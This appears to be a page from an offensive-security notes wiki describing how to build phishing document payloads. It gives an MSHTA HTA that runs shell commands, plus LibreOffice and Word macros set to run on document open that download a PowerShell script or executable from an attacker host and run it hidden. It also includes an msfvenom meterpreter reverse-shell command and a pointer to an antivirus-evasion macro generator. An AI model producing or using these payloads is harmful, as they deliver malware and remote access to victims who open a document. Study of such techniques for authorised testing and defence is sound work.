Phishing Payload

Prepare for phishing payload

MSHTA

# simple ping


<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>

<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

LibreOffice (Linux)

If your target have script to open the document, use LibreOffice is a simple way.

Write Documents
Create Macros

Tools > Macros > Organize Macro > Basic

[Basic Macros]

Untitled 1 > New > (give a name)

Macro payload:

Sub Main
    Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
    Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub

Tools > Customize > Events [Open Document]

> Macro... > (choose last macro)

Save Document.

Microsoft Word

make sure you save the document as doc or docm. just try that both for your payload.

Write Documents
Create Macros

make sure specify the Macros in to the current document.

View > Macros

[Basic Macros]

"MyMacro" > Create

Macro payload

check the encoded payload below:

Bypass All The Things

Save Document.

Macro

BadAssMacro

Bypass antivirus with this auto genreated macro:

https://github.com/Inf0secRabbit/BadAssMacros

Generate shellcode with format raw

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.raw

Generate VBA

.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Copy paste the out.txt to VBA Script.

Standard Format

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
    Dim exePath As String
    exePath = "C:\Windows\Tasks\" + "testing.exe"
    Shell str, vbHide
    Wait (3)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

PreviousSendemail NextBypass All The Things

Last updated 1 year ago